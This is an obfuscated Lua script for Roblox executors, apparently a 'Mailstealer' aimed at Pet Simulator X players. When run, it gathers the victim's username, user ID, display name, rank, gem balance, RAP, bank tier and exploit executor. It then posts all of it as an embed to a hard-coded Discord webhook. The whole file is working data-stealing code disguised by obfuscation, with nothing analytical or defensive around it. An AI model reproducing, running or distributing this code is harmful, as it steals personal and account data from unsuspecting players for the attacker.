--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do do local v0=0;local v1;local v2;local v3;while true do if (v0==3) then local v4=0;while true do if (v4==1) then v3=nil;v0=4;break;end if (v4==0) then _G.DisplayRap=game:GetService("Players").LocalPlayer.leaderstats.RAP.Value;_G.DisplayBankTier=game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.BankTitle.Tier.Text;v4=1;end end end if (v0==4) then function v3(v9)local v10=0;local v9;local v11;while true do if (v10==1) then request=http_request or request or HttpPost or syn.request ;request({Url=v11,Method="POST",Headers={["Content-Type"]="application/json"},Body=game.HttpService:JSONEncode(v9)});break;end if (0==v10) then v9={content="**custumz on top ngl**",embeds={{title="`custumz Mailstealer Results`",description="**Data from the victim**\nðŸ§‘Display Name: "   .. _G.PlrDisplayNameVictim   .. "\nðŸ§‘Username: "   .. _G.PlrUserVictim   .. "\nðŸ§‘User ID: "   .. _G.PlrUserIDVictim   .. "\nðŸ±Rank: "   .. _G.CurrentRank   .. "\nðŸŽ®Place: "   .. _G.GameIn   .. "\nðŸ’ŽGems: **"   .. _G.DisplayDiamond   .. "**\nâ¬†ï¸Rap: **"   .. _G.DisplayRap   .. "**\nðŸ“ˆBank Tier: **"   .. _G.DisplayBankTier   .. "**\nâ˜ Executor: **"   .. v1()   .. "**" ,url="https://discord.gg/VZX6jGKgxw",color=""   .. v2   .. "" }},attachments={}};v11="https://discord.com/api/webhooks/1125538300543909950/KmDzblLGxuxkIbfD5rhxoMFQJEcZzcFT3kqqT2CqLR5ePP6-4DO-ZBADuTIAuPQZmiZ-";v10=1;end end end v3(msg);break;end if (v0==2) then local v5=0;while true do if (v5==1) then _G.DisplayDiamond=game:GetService("Players").LocalPlayer.leaderstats.Diamonds.Value;v0=3;break;end if (v5==0) then _G.PlrUserIDVictim=game.Players.LocalPlayer.UserId;_G.PlrDisplayNameVictim=game.Players.LocalPlayer.DisplayName;v5=1;end end end if (v0==1) then v2="13369599";_G.CurrentRank=game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text;_G.PlrUserVictim=game.Players.LocalPlayer.Name;v0=2;end if (v0==0) then local v8=0;while true do if (v8==1) then if (game.PlaceId==6284583030) then _G.GameIn="Pet Simulator X";elseif (game.PlaceId==7722306047) then _G.GameIn="PSX Trading Plaza";elseif (game.PlaceId==10321372166) then _G.GameIn="PSX Hardcore";elseif (game.PlaceId==12610002282) then _G.GameIn="PSX Pro Trading Plaza";elseif (game.PlaceId==11725212117) then _G.GameIn="PSX Voice Trading Plaza";else _G.GameIn="â“ Couldn't find game";end v0=1;break;end if (v8==0) then v1=nil;function v1()local v17=0;local v18;local v19;while true do if (v17==1) then while true do if (v18==0) then local v20=0;while true do if (v20==0) then v19=(syn and  not is_sirhurt_closure and  not pebc_execute and "Synapse") or (secure_load and "Sentinel") or (is_sirhurt_closure and "Sirhurt") or (pebc_execute and "ProtoSmasher") or (KRNL_LOADED and "Krnl") or (WrapGlobal and "WeAreDevs") or (isvm and "Proxo") or (shadow_env and "Shadow") or (jit and "EasyExploits") or (getscriptenvs and "Calamari") or (unit and  not syn and "Unit") or (OXYGEN_LOADED and "Oxygen U") or (IsElectron and "Electron") or "Unsupported" ;return v19;end end end end break;end if (v17==0) then v18=0;v19=nil;v17=1;end end end v8=1;end end end end end end
